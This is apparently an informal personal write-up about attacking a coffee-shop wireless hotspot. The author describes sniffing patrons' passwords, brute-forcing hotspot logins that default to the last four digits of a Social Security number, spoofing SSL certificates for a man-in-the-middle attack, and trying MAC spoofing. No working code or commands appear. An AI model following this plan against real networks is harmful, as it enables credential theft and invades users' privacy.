This is all the fun shit I intended to do at Starbucks when I got
distracted by GoatseAP. It's a rough
draft and work in progress, but the basics are here. If you find any
inaccuracies, mail me.
The obvious thing to do was sniff traffic. And, yes, it is mildly
amusing watching a yuppie gathering blasting their usernames and
passwords out across the network, at least for a while. (Every once
in a while, you even get one that's good for a shell on someone's
Linux box, but it's usually just POP3.)
So, I found that the local Starbucks (well, ONE of the local Starbucks)
left their AP on at night in the local mall, and I decided to go bang on
the network's front door for a while.
The Network
When you associate to the AP, get a DHCP lease, and fire up your browser,
you get an intercept page until you authenticate over HTTPS. The last time
I tried a fingerprint, Nmap identified the intercept box as some sort of Sun
machine, but I don't recall exactly.
What interested me was that DNS queries seem to be unaffected by the intercept
mechanism, although TCP queries don't seem to work. It'd be interesting to
do an IP tunnel over port 53/udp...
Dictionary attacks
If you're a T-Mobile subscriber with a
hotspot feature on your
account, your username is your phone number, and your password defaults to
the last four digits of your social security number -- yes, really. T-Mobile
uses this for pretty much everything. Every once in a while, they ask for
mom's maiden name, but 99% of the time, it's the last four of your SSN.
You can change this password, but I don't imagine it happening that often.
There also appears to be no sort of limit on how many bad login attempts
you get; I wrote a Perl program to run a dictionary attack on the intercept
page, and never got booted. (I lost this program two disk crashes ago, but
it was pretty trivial to write.)
So, given these two pieces of information, theoretically, all one would
have to do is grab a list of exchanges within an area code serviced by
T-Mobile, and run a dictionary attack on each number within that exchange.
Man-in-the-Middle attacks
And then there's the standard MitM attack. Spoof an SSL certificate --
nine times out of ten, they'll just click "Accept this self-signed haxx0r's
certificate" -- and relay requests to the real AP. You could probably do
this with airpwn, too.
Once they log in with their hotspot username and password, well. You can
figure it out.
MAC spoofing
I've tried this a couple times, but it didn't seem to work; probably, either
the address collisions were causing problems, or the IP and hardware addresses
are associated with each other in the router's mind, or both. None would
surprise me too much. Or maybe I was just missing something from being wired
on shitty coffee, I dunno.